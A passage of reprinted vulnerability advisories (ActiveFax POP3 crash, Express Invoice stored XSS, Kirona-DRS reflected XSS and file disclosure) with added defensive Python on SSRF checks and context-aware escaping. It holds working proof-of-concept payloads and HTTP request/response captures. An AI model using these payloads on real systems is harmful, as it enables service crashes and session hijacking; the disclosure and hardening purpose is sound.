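    """Fetch the feed after validation; a redirect raises instead of being followed."""
    check_ical_url(url, resolver)
    opener = urllib.request.build_opener(NoRedirectHandler())
    with opener.open(url, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    # Constructed resolver so the example runs offline.
    table = {"calendar.example": {"93.184.216.34"}, "intranet.example": {"10.0.0.5"}}
    for candidate in ("https://calendar.example/team.ics", "https://intranet.example/x.ics"):
        try:
            print("allowed:", check_ical_url(candidate, table.__getitem__))
        except ValueError as err:
            print("refused:", candidate, "->", err)
```

Two caveats carry over to any real implementation: the address check is a time-of-check/time-of-use race if the name is resolved again at connect time (resolve once and connect to the vetted address, or repeat the check in the connection layer), and refusing redirects outright is simpler and safer than re-validating each hop, because the redirect target is exactly the part the attacker controls.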


ActiveFax Server 6.92 Build 0316 Denial Of Service

ActiveFax Server version 6.92 build 0316 POP3 server denial of service exploit.


MD5 | 5896e9ae79393b887db98e386f2043db

# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service
# Date: 2019-10-12
# Vendor Homepage: https://www.actfax.com/
# Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe
# Exploit Author: Achilles
# Tested Version: 6.92
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run python code : ActiveFax_Server.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open ActiveFaxServer.exe
# 4.- Open the Pop3 Server Config
# 5.- Press New
# 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password'
# 7.- Press OK twice
# 8.- You will see a crash.

#!/usr/bin/env python

# 6000 'A' (0x41) characters, written to Evil.txt for pasting into the POP3 server fields
buffer = "\x41" * 6000

try:
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except Exception:
    print("File cannot be created")

Express Invoice 7.12 Cross Site Scripting

Express Invoice version 7.12 suffers from a persistent cross site scripting vulnerability.


MD5 | a508267204d0e7f0085a1924b7c52caf

# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-13
# Vendor Homepage: https://www.nchsoftware.com/
# Source: https://www.nchsoftware.com/invoice/index.html
# Version: Express Invoice v7.12
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)

# About Express Invoice v7.12
==============================
Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment.

# Vulnerability
================
Persistent Cross site scripting (XSS).

# PoC
======

1. Log in as an authenticated unprivileged user to the Express Invoice version 7.12 web-enabled service, i.e. http://A.B.C.D:96 [default installation].

2. Under "Invoices": Invoices List -> View Invoices -> Add New Invoice -> Customer field: put </script><script>alert('XSS');</script>

Save the change.

or

Under "Items"
Items -> Add new item-> Item field: put </script><script>alert('XSS');</script>

Save the change.

or

Under "Customers"
Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script>

Save the change.

or

Under "Quotes"
Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script>

Save the change.

3. Log in as an authenticated privileged or unprivileged user to the Express Invoice v7.12 web-enabled service and visit any of the Invoices/Items/Customers/Quotes sections; the persistent XSS payload will execute.


# Disclosure Timeline
======================
Vulnerability discovery date: 12-Sep-2019.
Vulnerability notification to vendor via vendor-provided web form: 12-Sep-2019, 13-Sep-2019, 19-Sep-2019, 26-Sep-2019; no response.
Submitted to exploit-db: 14-Oct-2019.


# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
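
The Express Invoice advisory above and the two OX App Suite XSS entries (66081, 66025) are the same defect: a stored field (customer name, appointment title, folder name) rendered without context-appropriate escaping. The added Python example below (not the vendors' code) puts the vulnerable interpolation next to the hardened one, using the advisories' own payloads as test input. The leading </script> in the Express Invoice payload suggests the field is emitted inside an inline script; that is an assumption, and the page layout and function names are constructed.

```python
import html
import json

# Payloads quoted from the advisories above; used here only as test input.
PAYLOAD_SCRIPT = "</script><script>alert('XSS');</script>"          # Express Invoice
PAYLOAD_ATTR = 'ayb"><img src=x onerror=alert(document.domain)>'    # OX folder selector


def render_unescaped(customer):
    """The vulnerable pattern: the stored field is interpolated raw into markup
    and into an inline script (assumed layout)."""
    return ("<table><tr><td>" + customer + "</td></tr></table>\n"
            "<script>var customer = '" + customer + "';</script>")


def render_customer_cell(name):
    """HTML element context: entity-encode <, >, & and both quote characters."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


def render_folder_option(folder_id, folder_name):
    """HTML attribute and element context for a folder selector entry."""
    return ('<option value="' + html.escape(str(folder_id), quote=True) + '">'
            + html.escape(folder_name, quote=True) + "</option>")


def render_js_literal(value):
    """JavaScript string context inside an inline <script>: JSON-encode, then
    neutralise the two sequences the HTML parser acts on before any JS runs."""
    return json.dumps(value).replace("</", "<\\/").replace("<!--", "<\\!--")


def render_escaped(customer):
    """Hardened page: each output context gets its own encoder."""
    return ("<table><tr>" + render_customer_cell(customer) + "</tr></table>\n"
            "<script>var customer = " + render_js_literal(customer) + ";</script>")


def script_closers(page):
    """Number of raw </script sequences; this page legitimately contains exactly one."""
    return page.lower().count("</script")


if __name__ == "__main__":
    print("unescaped </script count:", script_closers(render_unescaped(PAYLOAD_SCRIPT)))
    print("escaped   </script count:", script_closers(render_escaped(PAYLOAD_SCRIPT)))
    print(render_folder_option(3, PAYLOAD_ATTR))
```

The point worth keeping is in render_js_literal: html.escape is right for element and attribute contexts but does nothing for a value placed inside a script block, where the HTML parser ends the script at the first </script regardless of JavaScript quoting. JSON-encoding plus escaping of </ and <!-- covers that context; the same attribute-context rule applies to reflected values such as the hidden input in the Kirona advisory that follows.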

Kirona-DRS 5.5.3.5 Information Disclosure

Kirona-DRS version 5.5.3.5 suffers from an information disclosure vulnerability.


MD5 | 1ad461dc20fcb2430087ea185aee932a

# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure
# Discovered Date: 2019-10-03
# Shodan Search: /opt-portal/pages/login.xhtml
# Exploit Author: Ramikan
# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/
# Affected Version: DRS 5.5.3.5, possibly other versions.
# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14
# Vendor Fix: Unknown
# CVE: CVE-2019-17503,CVE-2019-17504
# Category: Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities

# Description:
# The application is vulnerable to HTML injection, reflected cross site scripting and sensitive data disclosure.

# Vulnerability 1: HTML injection and reflected cross site scripting (CVE-2019-17504)
# An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS)
# vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter.

Affected URL: /osm/report/

Affected Parameter: password


POST Request:

POST /osm/report/ HTTP/1.1
Host: 10.50.3.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Connection: close
Referer: https://10.50.3.148/osm/report/
Upgrade-Insecure-Requests: 1

create=true&password=&login=admin&password='<"><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
XDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>
<img src='logo.jpg'>
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<"><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html>


GET Request:

GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1
Host: vs-kdrs-l-01.selwoodhousing.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:53:35 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
XDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>
<img src='logo.jpg'>
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<"><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html>


***************************************************************************************************************************
Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503)
***************************************************************************************************************************

An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.

Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd

# Request:

GET /osm/REGISTER.cmd HTTP/1.1
Host: 10.0.0.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 09:23:54 GMT
Server: Apache
Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT
ETag: "1fc4-55d612f6cae13"
Accept-Ranges: bytes
Content-Length: 8132
Connection: close

@echo off

set DEBUGMAPSCRIPT=TRUE

rem
rem Find root path and batch name
rem root path is found relative to the current batch name
rem

rem turn to short filename (remove white spaces)
for %%i in (%0) do (
set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi
set MAPSCRIPTBATCH_FILE=%%~i

)
for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do (
set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\..
)

if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR%
if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE%

rem
rem find if we are in INTERRACTIVE mode or not and check the parameters
rem
if "%1"=="" goto INTERACTIVE
goto NONINTERRACTIVE


:NONINTERRACTIVE
rem non interractive call so catch the parameters from command line
rem this is supposed to be called from the root DRS directory

if "%2"=="" (
echo Invalid parameter 2
pause
goto :EOF
)

set ACCOUNT=%2
set STATIC=NO
if "%1"=="STATIC" set STATIC=YES

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT%

if "%1"=="STATIC" goto GLOBAL
if "%1"=="DYNAMIC" goto GLOBAL
echo Invalid parameter 1
pause
goto :EOF

:INTERACTIVE
rem Interractive mode : ask for account and static mode
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode
echo Open Street Map setup for Xmbrace DRS
set /P ACCOUNT=Account name:
set /P STATIC=Limited map feature (YES/NO):


rem back to the setup directory
cd %MAPSCRIPTROOTDIR%

rem # READ AND DEFINE SETTINGS
for /F "tokens=1,* delims==" %%k in (conf\default.txt) do (
if not "%%k"=="#=" set %%k=%%l
)
if exist CUSTOM\CONF\custom.txt (
for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do (
if not "%%k"=="#=" set %%k=%%l
)
)
for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do (
if not "%%k"=="#=" set %%k=%%l
)

if "%APACHE_USE_SSL%"=="TRUE" (
set DEFAULT_HTTP_PROTOCOL=https
set APACHE_USE_SSL_VALUE=true
set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT%
) else (
set DEFAULT_HTTP_PROTOCOL=http
set APACHE_USE_SSL_VALUE=false
set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT%
)

goto GLOBAL



rem
rem good to go in non-interactive mode
rem the following is the generic part of the install, whether we are in static or dynamic mode
rem
:GLOBAL
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section

set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe"

rem remove any previously registered map actions and map tab for this account
rem (the MySQL login and password are passed on the mysql.exe command line below)
echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE)

if "%STATIC%"=="YES" goto :STATIC
goto :DYNAMIC



:STATIC

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section

echo map=static > ACCOUNTS\%ACCOUNT%\config.txt

echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php

echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
if exist req.sql del req.sql
goto FINAL


:DYNAMIC

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section

echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt

echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php

echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql


set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT)

echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

if exist req.sql del req.sql
goto FINAL


:FINAL
echo Map registered for %ACCOUNT%
if "%1"=="" pause
goto :EOF
